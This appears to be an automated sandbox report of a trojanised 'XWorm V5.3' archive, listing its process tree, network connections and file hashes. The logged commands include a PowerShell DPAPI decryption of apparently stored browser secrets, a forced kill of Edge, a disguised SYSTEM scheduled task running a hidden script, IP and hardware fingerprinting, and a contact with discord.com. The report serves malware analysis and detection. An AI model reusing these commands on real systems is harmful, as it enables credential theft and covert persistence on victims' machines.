C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin.rar"

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\xworm5.3loaderx64cleandbyezerodwaboutthelogiwasbored.exe

"C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\xworm5.3loaderx64cleandbyezerodwaboutthelogiwasbored.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,1024471416527281725,12789962287658534519,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5240 /prefetch:2

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe

"C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe

C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe

"C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=1860,i,18376987905235387999,8804655464557671786,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe

"C:\ProgramData\Epic\Launcher\EpicGamesLauncher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\EpicGamesLauncher" --mojo-platform-channel-handle=2216 --field-trial-handle=1860,i,18376987905235387999,8804655464557671786,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cscript.exe

cscript //nologo "C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell wininit.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\EpicGamesLauncher\CheckEpicGamesLauncher.bat" "

C:\Windows\system32\wininit.exe

"C:\Windows\system32\wininit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 mega.nz udp
LU 31.216.145.5:443 mega.nz tcp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 5.145.216.31.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.13:443 g.api.mega.co.nz tcp
LU 66.203.125.13:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 13.125.203.66.in-addr.arpa udp
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
LU 31.216.145.5:443 mega.nz tcp
US 8.8.8.8:53 eu.static.mega.co.nz udp
NL 66.203.127.13:443 eu.static.mega.co.nz tcp
NL 66.203.127.13:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 13.127.203.66.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
NL 66.203.127.13:443 eu.static.mega.co.nz tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
N/A 127.0.0.1:6341 tcp
N/A 127.0.0.1:6341 tcp
US 8.8.8.8:53 gfs208n198.userstorage.mega.co.nz udp
FR 185.206.26.118:443 gfs208n198.userstorage.mega.co.nz tcp
FR 185.206.26.118:443 gfs208n198.userstorage.mega.co.nz tcp
FR 185.206.26.118:443 gfs208n198.userstorage.mega.co.nz tcp
FR 185.206.26.118:443 gfs208n198.userstorage.mega.co.nz tcp
FR 185.206.26.118:443 gfs208n198.userstorage.mega.co.nz tcp
FR 185.206.26.118:443 gfs208n198.userstorage.mega.co.nz tcp
US 8.8.8.8:53 118.26.206.185.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:80 api.ipify.org tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0764f5481d3c05f5d391a36463484b49
SHA1 2c96194f04e768ac9d7134bc242808e4d8aeb149
SHA256 cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3
SHA512 a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224

\??\pipe\LOCAL\crashpad_804_LQCILPALJJCSLUAY

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e494d16e4b331d7fc483b3ae3b2e0973
SHA1 d13ca61b6404902b716f7b02f0070dec7f36edbf
SHA256 a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165
SHA512 016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6a7c699b7d23dff20eac18818f284d24
SHA1 ab5d605fd5cd2003bffaedda0cf135224fba2eca
SHA256 635a032a7b353dad8de6bb48efd0780cf11ab61cb4c2cb7e69dae17c0e838593
SHA512 7a69a10bb7604fc693f4814a006efbfd9220c857e0bb4ea28736cc65b9446163227f6c81596d84ef130ccbaabbc65c7bd5b615c71da689fe40d1d5712049e052

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f4795789410b77b88ab6099d05d66d93
SHA1 636a1769a1f54a2ae45b90ec44576a678a38af33
SHA256 fd661df9a5554233b2b086ce268264f753873571955d80c5db201448a1cdc14f
SHA512 4f46feea4e1d571f976f73f4ce634260bb274c34fd8afb8e0f4b886f119638bc9c17eac3f99709118dd17ca0f8850b5cfc6b7e009df84d8c05eeb4abcb7317bc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3b9f968ecf488c893f9b201ec4cf497d
SHA1 4fb6761195f31bfb3197de9cc1e244464271523f
SHA256 f3da27d6466adfd181ff355bc7b4218e56b1d2d9438d2e6186cf9c56f3265930
SHA512 444727b092d52c2cb3c0b129d68d52726a50cb69104222396e3b676fdfabc74ca81bdc92607a226d1493e400383706cec120cc99e841be22afada9441f9b3f7f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7a66a776aead22cc09ad93134277b506
SHA1 1cffa6d219594266e3813e7227358110a9214b92
SHA256 5551fb20ae0b00861b90a6b8d7a40e08ed0891610e59e52090e1d93e0178732e
SHA512 b565ec6f0f03bd7892cb542d49b35d921385194003ddde6fe781257197d109bfe28dd5ea781f85cc8c48d6b39da4084db68010f7c23ccc2c0c839f6727d32048

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\00\00000000

MD5 9bca774481448d7979e656686901323e
SHA1 bf9deba0fadb55e07d58eb534d643803a13471e8
SHA256 22058e2af2f5e08d2f9e921202ce270f94d06593462ebc3ab7ed15e89d0a785a
SHA512 bdf3df5cf9f62b9aed2077fe73e434509fa85bac434bd14436d43d18d480d262a16ce9d835f2970709e7c576fba167100ccf10464a8295d477334b994f3cf428

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001

MD5 3fd11ff447c1ee23538dc4d9724427a3
SHA1 1335e6f71cc4e3cf7025233523b4760f8893e9c9
SHA256 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed
SHA512 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 96c96c316455b02df34ff14e04a8770b
SHA1 1465bebfa38181de1c82646486f511e6c8d67485
SHA256 23b58b4244428f6034f3b1a5d2a84efcd9a50bb8df9717a58312d4d74bff2e59
SHA512 e94fa6bed72aded83c32a23f7fb71aac11e09db254a6c72c141f4efcd499a204a4c372d5443ffef0011f12bf7248a548b5940ca4fc9b70f0f269f5d26e97a71b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old

MD5 7e599c4b01b663e361a2d83c53566553
SHA1 4beaced102b54ca97f1a28c0b8b3a6fbad2032ce
SHA256 7292da31b9d015b1a6dc4f747b115b1b09f7e5b19b97a33dc729c72ac8fefdb7
SHA512 2b0835c6ff880ac20eff711daab08108a65f0c4274c0fb60297d8f8f7599cafa1aa7a84b876cb365355f65c0b7b094348973e08c8d78b535685eb27a4c78dd28

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old~RFe583004.TMP

MD5 07255d3017b4722d152e55684827f5e3
SHA1 54d79b828ce61c85494ed15ce7d78f401c702b12
SHA256 aa0507f629b5c48f6740cb3e5da345ce1ef39f7aa518cd4db40f4308db497d5f
SHA512 c78d445b5fd45840265ffb9d231264b743ed92fa71d3c5a4fb28057d65f8e69f96a7c67e766295b04ca903b2d5489304e948890a005ec3d7369bcb67c87f9a1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 d2c1452b45a6588bdc8d0d7dfce17a27
SHA1 0a96dd4d5e0b41c9426675d6e1bd7a5b061e175f
SHA256 ab428d36832eb7c50685250235bdd2313375db866ecc2339aca5d8d1d89433db
SHA512 a65ab2089bc8f4bcd36334f58c0dc26ac1975321504f382a2edf70972e852a90a40a86f6ad28d70f1c9488685dc0ed593061733d63db31c534a9ce39bfb188e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe585213.TMP

MD5 6f13b3ef56817e9d9637192d61d009e8
SHA1 de44bbdd48c442650450431c62cf3a62f7a559ed
SHA256 046263c0b6ab4c76bcfc35cc139a9c89623e18d14cc199f24c0fcd026818cb28
SHA512 420641f0f4258301a78d34b9af6f77242a0b2dfb7fcc70868dab43f201e6e10e1477a19b044f382b0835230006c1585c545ee5ed740bb6e6acacc15b8a521bbe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old

MD5 e0ab00378184a1223c150e85a6d3d669
SHA1 c4e90469abacfb5514c6430490ae2efbfc5d4ea8
SHA256 896eec1edb72dc30867e53d3f5e9ca7e3446459c064fe488d2ffcfa4cc423ffb
SHA512 33b3b3332b74722d14bbd1f544300b64a5eca1029bd51b68eeb2a21399958f5e9736c360d30599105c69110e18f2c0f7a1e999c90fdd3f09b5beaf962d9d5173

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\000003.log

MD5 e1b3d75a7db11ea58de7f970d74e9c2d
SHA1 6fb654892b90a93830ecd0862977be1b1e13c4d5
SHA256 b1def7940ea5b3ec8c932aad9cbf1dfd003648540fadec5ec74c89bcc708cfce
SHA512 315c51fb6ba2c1dc1a3122e7bdac683a546641e8b8676414faa54102a88aaca3c78646f102270c46f07b4cd1b4f1c517a8efb312ea69fcb3d53647eaeab9637f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\LOG.old

MD5 ee99a39395a72924b0590fdfc5533654
SHA1 979204ae70d1b78b9b6d6c253bfe017cf4c8da48
SHA256 9a25d621123161569d9a5c4928f4948183877c39014ebc375c88096dab7dfa83
SHA512 063bfc06bc1cd95201d8ac4d62b5d1689e533eab292d6b61d5b84fc0e8c6e595de4081a11ba5805f24445fa4d2c0dfd7c6201539970a51ec61934dcb93753048

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 45c19b029a056cae0018663b5b349867
SHA1 ee787c62da42bd1fb0858b7b61b199a07a98f5c1
SHA256 db2790bd68c725d53df1c9f4ed6d9c7bbf67143ee678ccf9557386deeb6b066c
SHA512 954a208eee370ff7fc1fae73266d1f2315e019177d926a8a48c189ff9303ef3ad1c3f9ce4be1dbce663eb9835df0e4dcf0d8b9eabfdf7a7924fc149d31a252c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 008114e1a1a614b35e8a7515da0f3783
SHA1 3c390d38126c7328a8d7e4a72d5848ac9f96549b
SHA256 7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18
SHA512 a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c9411d795975475826c775928acdec82
SHA1 e69cb78ad3c98ea73a8595e3415e2fb88f5fb764
SHA256 009f931952a3920313d8d549606831030264c3fabdbd38ff93c1a9e69916d5a5
SHA512 d56d923ca152731696c27dff835ad7ad9078f77525b7b4c970113f4188bcf5d9beab42939afe4bd18891bfa9d10318d634c118515073ca5181d7817fa27b9bf2

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin.rar

MD5 956b25e3754d332dfbf5bf731f7985ed
SHA1 5fcac4de773e3d4820fd9336e1b9c5d66279a85d
SHA256 f8f128c462083f28d951b9e0e70a33b41e1224fb27aad89ae89ad3a8cf22c173
SHA512 4d09596942c05ca57239e1c2b744519433e68db8bda19ae3b4ba6b2dc96e15a47b330f693edcd51f7f6be1f621d8e4aed8273cfdf6e4cfc15d6453abc6dd9163

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\Icons\icon (15).ico

MD5 e3143e8c70427a56dac73a808cba0c79
SHA1 63556c7ad9e778d5bd9092f834b5cc751e419d16
SHA256 b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188
SHA512 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\xworm5.3loaderx64cleandbyezerodwaboutthelogiwasbored.exe

MD5 903b0f01e033f28cd81350f89d758fbb
SHA1 77a96c8df0c8b151b48547389ea967a4c16f71d2
SHA256 4371a880239b102ec161de5466b4bf2507faa234346c42c98efa3ebf59b67c80
SHA512 bce773c303c3a99b1e85c452af92248a1d1415ec0cdff40c0e6c98197ad3e3c1ebc04922416413c1419d6831dfdf6a4f828a918cd5a34b0a1bb717e60b32ff51

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\xworm5.3loaderx64cleandbyezerodwaboutthelogiwasbored.exe

MD5 81b9fa39347e8c175e028e9148c4bb3d
SHA1 98cfc83a4a4a72d768137f5c1204add5ff03ace6
SHA256 a9cfb9a72a9314067ea337310264e2e6a51ce1a31f70b4204fa2d417ff764a98
SHA512 4e4d2b392f359eb2a3c527a50b69ca6cc2e1ec3cab76b0e729f460822d0d1eaf0cca039bdcbc7e9abfa0c59096ce2c61760597a74c3bb2f62822889ccecfc798

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nst7E30.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe

MD5 226c4a6d74ef99eecce1e3780cae5f8a
SHA1 4a9f780655925ceb26a7a7b7ddc0b5e740dd304a
SHA256 4664c1307397d40b57a5b5299098de5ccf7f158d7e8968276d43e2625aa5f315
SHA512 a2be5957a071e2e6fcd4837448eeeea3680436897c03b3599fba8770059692e73efbb42e250cacee61338e8dbd0eb7884a20b07037a32b4ddb7157e66191508b

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe.config

MD5 66f09a3993dcae94acfe39d45b553f58
SHA1 9d09f8e22d464f7021d7f713269b8169aed98682
SHA256 7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7
SHA512 c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed

C:\Users\Admin\Downloads\XWorm V5.3 Optimized Bin\XWorm V5.3.exe

MD5 1b9a5efbcac835261b0a3a8db869a75b
SHA1 8c011b3d5141c766833decdb50eae68f372bcb7c
SHA256 22839d479f9042d1515ee49acc043279b2c8ff3fccfe859801281dcc6d9f4236
